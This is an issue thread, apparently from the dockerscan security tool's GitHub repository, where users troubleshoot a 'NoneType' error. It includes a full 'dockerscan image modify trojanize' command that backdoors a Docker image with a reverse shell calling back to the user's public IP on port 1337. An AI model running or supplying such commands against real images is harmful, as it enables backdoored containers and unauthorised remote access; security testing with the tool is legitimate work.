cr0hn / dockerscan

Docker security analysis & hacking tools

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

'NoneType' object has no attribute 'append'

kanumuruwe45 opened this issue · comments

Hi Team,
I am trying to trojaninze the image after pulling it from the Amazon ECR registry then I save it as vulflask
But image URI look like this in Amazon ECR (public.ecr.aws/w5b0z5r9/vulflask)
docker pull public.ecr.aws/w5b0z5r9/vulflask && docker save public.ecr.aws/w5b0z5r9/vulflask:latest -o ase-vul_flask
I am using the below command for trojanize
Command :
dockerscan image modify trojanize vulflask -l $(curl -XGET -s http://checkip.amazonaws.com/) -p 1337 -o vulflask-trojanized
[ * ] Starting analyzing docker image...
[ * ] Selected image: 'vul_flask'
[ * ] !! 'NoneType' object has no attribute 'append'
Anyone can provide info related to this?
Any leads are highly appreciated!

i am seeing the same error. was this resolved?

Yes, it is resolved, it is the issue with my mac hardware.
I didn't have this issue in VM or on any other device.
Please build the image on a different device.
I thought it was me who had this issue
Hope this helps